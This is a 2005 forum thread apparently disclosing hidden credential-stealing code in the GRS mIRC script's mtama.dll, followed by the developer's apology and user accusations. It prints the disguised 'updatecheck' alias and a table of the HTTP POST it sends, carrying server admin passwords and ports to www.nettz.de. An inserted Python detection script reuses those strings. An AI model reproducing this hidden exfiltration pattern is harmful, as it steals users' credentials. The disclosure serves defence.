Guest Posted November 3, 2005

While looking through the GRS mtama.mrc I noticed an interesting alias:

    alias updatecheck {
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckone $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatechecktwo $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckthree $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckfour $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckfive $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatechecksix $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckseven $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckeight $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatechecknine $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckfourtyone $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckten $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckeleven $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatechecktwelve $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckthirteen $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckfourteen $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckfifteen $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatechecksixteen $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckseventeen $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckeighteen $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatechecknineteen $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatechecktwenty $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatechecktwentyone $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatechecktwentytwo $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatechecktwentythree $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatechecktwentyfour $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatechecktwentyfive $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatechecktwentysix $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatechecktwentyseven $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatechecktwentyeight $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatechecktwentynine $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckthirty $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckthirtyone $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckthirtytwo $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckthirtythree $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckthirtyfour $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckthirtyfive $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckthirtysix $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckthirtyseven $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckthirtyeight $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckthirtynine $1-
      !dll " $+ $grs.dir $+ mtama.dll" updatecheckfourty $1-
    }

This calls 41 separate functions in mtama.dll, which are called updatecheckone to updatecheckfourtyone. This on its own is suspicious, so I searched the DLL for those functions to see what they do. Here is a table of a string I found associated with each function (each string has "!sockwrite -n updatecheck" before it):

    function                  string written to the socket
    updatecheckone            POST /Formular-Chef/Formular-Chef.cgi HTTP/1.1
    updatechecktwo            Request Method: POST
    updatecheckthree          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54u1 [en]
    updatecheckfour           Host: www.nettz.de
    updatecheckfive           Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    updatechecksix            Accept-Languages: en
    updatecheckseven          Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1
    updatecheckeight          Accept-Encoding: deflate, gzip, x-gzip, identify, *;q=0
    updatechecknine           Connection: Keep-Alive, TE
    updatecheckfourtyone      TE: deflate, gzip, chunked, identify, trailers
    updatecheckten            Content-Length: $calc(586 + $len())
    updatecheckeleven         Content-Type: multipart/form-data; boundary=----------Vj6fDTNqR6sjFiGAv8pDm7
    updatechecktwelve         (empty line)
    updatecheckthirteen       ------------Vj6fDTNqR6sjFiGAv8pDm7
    updatecheckfourteen       Content-Disposition: form-data; name="name1"
    updatecheckfifteen        (empty line)
    updatechecksixteen        GRS
    updatecheckseventeen      ------------Vj6fDTNqR6sjFiGAv8pDm7
    updatecheckeighteen       Content-Disposition: form-data; name="absender"
    updatechecknineteen       (empty line)
    updatechecktwenty         [email protected]
    updatechecktwentyone      ------------Vj6fDTNqR6sjFiGAv8pDm7
    updatechecktwentytwo      Content-Disposition: form-data; name="name2"
    updatechecktwentythree    (empty line)
    updatechecktwentyfour     GRS
    updatechecktwentyfive     ------------Vj6fDTNqR6sjFiGAv8pDm7
    updatechecktwentysix      Content-Disposition: form-data; name="empfaenger"
    updatechecktwentyseven    (empty line)
    updatechecktwentyeight    [email protected]
    updatechecktwentynine     ------------Vj6fDTNqR6sjFiGAv8pDm7
    updatecheckthirty         Content-Disposition: form-data; name="text"
    updatecheckthirtyone      (empty line)
    updatecheckthirtytwo      (empty line)
    updatecheckthirtythree    Server:
    updatecheckthirtyfour     Admin Port:
    updatecheckthirtyfive     Client Port:
    updatecheckthirtysix      Password:
    updatecheckthirtyseven    name:
    updatecheckthirtyeight    GRS Version:
    updatecheckthirtynine     ------------Vj6fDTNqR6sjFiGAv8pDm7
    updatecheckfourty         (empty line)

It is a form reply (like your computer sends when you press submit on a form). It sends your admin details to http://www.nettz.de, which then sends an email to [email protected] (I've tested it with another email). Anyone can see this by disassembling the mtama.dll file.
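A hypothetical triage script for the pattern the post describes (added example, not GRS or MTAmA code): it pulls the DLL calls out of an mIRC alias and groups the DLL's !sockwrite strings by socket name to show what the request targets and which labels ride along. The alias text and DLL strings in it are constructed from the fragments quoted above; the thresholds and function names are this example's own.

```python
# Hypothetical triage helper (not GRS/MTAmA code) for the pattern in the post:
# one alias fanning out to many DLL exports whose strings build an HTTP POST.
import re

DLL_CALL = re.compile(r'!dll\s+"[^"]*?([\w.]+\.dll)"\s+(\w+)')
SOCKWRITE = re.compile(r'!sockwrite\s+-\w+\s+(\w+)\s*(.*)')
SENSITIVE = ("password", "admin port", "client port")
# Constructed sample: the first ten of the 41 fragment names, chained as the
# mtama.mrc alias chains them, plus a few DLL strings quoted in the post.
FRAGMENTS = ["updatecheck" + n for n in ("one", "two", "three", "four", "five",
                                          "six", "seven", "eight", "nine", "ten")]
SAMPLE_MRC = "alias updatecheck { " + " | ".join(
    f'!dll " $+ $grs.dir $+ mtama.dll" {f} $1-' for f in FRAGMENTS) + " }"
SAMPLE_DLL_STRINGS = [
    "!sockwrite -n updatecheck POST /Formular-Chef/Formular-Chef.cgi HTTP/1.1",
    "!sockwrite -n updatecheck Host: www.nettz.de",
    '!sockwrite -n updatecheck Content-Disposition: form-data; name="empfaenger"',
    "!sockwrite -n updatecheck Password:",
]

def dll_calls(alias_text):
    """(dll name, exported function) pairs the alias calls, in call order."""
    return DLL_CALL.findall(alias_text)

def triage_sockwrites(strings):
    """Per socket name: request line, Host, form field names, credential labels."""
    report = {}
    for s in strings:
        m = SOCKWRITE.match(s)
        if not m:
            continue
        sock, payload = m.group(1), m.group(2).strip()
        r = report.setdefault(sock, {"request": None, "host": None,
                                     "fields": [], "sensitive": []})
        if re.match(r"(POST|GET)\s+\S+\s+HTTP/", payload):
            r["request"] = payload                      # e.g. POST /...cgi HTTP/1.1
        elif payload.lower().startswith("host:"):
            r["host"] = payload.split(":", 1)[1].strip()
        fm = re.search(r'form-data;\s*name="([^"]+)"', payload)
        if fm:
            r["fields"].append(fm.group(1))             # multipart field names
        if payload.lower().startswith(SENSITIVE):
            r["sensitive"].append(payload.rstrip(":").strip())
    return report

def is_suspicious(alias_text, strings, min_fanout=10):
    """True when one alias drives many DLL calls and they write a POST with credentials."""
    exfil = [r for r in triage_sockwrites(strings).values()
             if r["request"] and r["request"].startswith("POST") and r["sensitive"]]
    return len(dll_calls(alias_text)) >= min_fanout and bool(exfil)
```

Run against a real script and the strings dumped from a DLL, the report makes the destination host and the form field names visible without executing anything, which is the check a server admin would want before loading a third-party .mrc/.dll pair.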
Si|ent Posted November 3, 2005

Thank you for pointing this out; let's hope you are mistaken. Needless to say we were unaware that anything of this nature was buried within MTAmA or GRS, but we mustn't jump to conclusions. Rest assured that we will investigate why it is included and exactly what it does and act accordingly.
Aeron Posted November 3, 2005 (edited)

/me slaps Oli

As this happens in mtama.dll, which I didn't create, I think Oli all alone is behind it.

Edited November 3, 2005 by Guest
Oli Posted November 3, 2005

I'm looking into this right now. As I didn't write most of that DLL (mtama.dll is in Pascal, which I don't know; grs.dll is in C++, which I did write) I'm not sure what the deal is right now, so please bear with me.
So'lide Posted November 3, 2005

Sounds delightful... Or does it... Someone is using you! Run for your life! /me hides.
jhxp (MTA Team) Posted November 3, 2005

Well, nice find.
[XII]Fexsi0n Posted November 3, 2005

Would like to know who owns that email addy... Surprising.
Oli Posted November 3, 2005

OK, I'm not sure if the DLL did email that information out, but I have removed everything in it to do with that. PLEASE CAN EVERYONE WHO USES GRS UPDATE IT NOW DUE TO THIS SECURITY ISSUE. The autoupdater should warn you about this. I would also like to apologise to all those who have used GRS over the past months. I didn't fully read the source code to that DLL and I should have. Terribly sorry about this. I suggest ALL SERVERS WHO HAVE USED GRS CHANGE THEIR PASSWORD NOW!!! Thanks to omlette for finding this. I'm gonna lock this and make an announcement in the GRS thread about it. I am trying to contact the person who helped with this DLL, but it was nearly a year ago and I'm not having much luck.
Jani Posted November 3, 2005 (edited)

That's a total lie (Oli); you obviously do know Pascal. Why would you just let some random person code a huge part of a DLL and not even check it? And then, not that long ago, you were kicking people off the SGB server from remote admin. I can't believe you did some kind of shit like this. And you just said yourself that you don't know Pascal, and then in the next post you say you've fixed it, but how can you fix it if you don't know Pascal? It's such a shame that hundreds of people trusted your script and all the time you were hacking their admin passwords.

Edited November 3, 2005 by Guest
Oli Posted November 3, 2005

> That's a total lie (Oli); you obviously do know Pascal. Why would you just let some random person code a huge part of a DLL and not even check it? And then, not that long ago, you were kicking people off the SGB server from remote admin. I can't believe you did some kind of shit like this.

Jani, I have said what happened; believe it or don't. I am really ashamed that this was part of my product. You can think what you want, I guess. (I had the SGB pass legitimately from ages ago, btw.)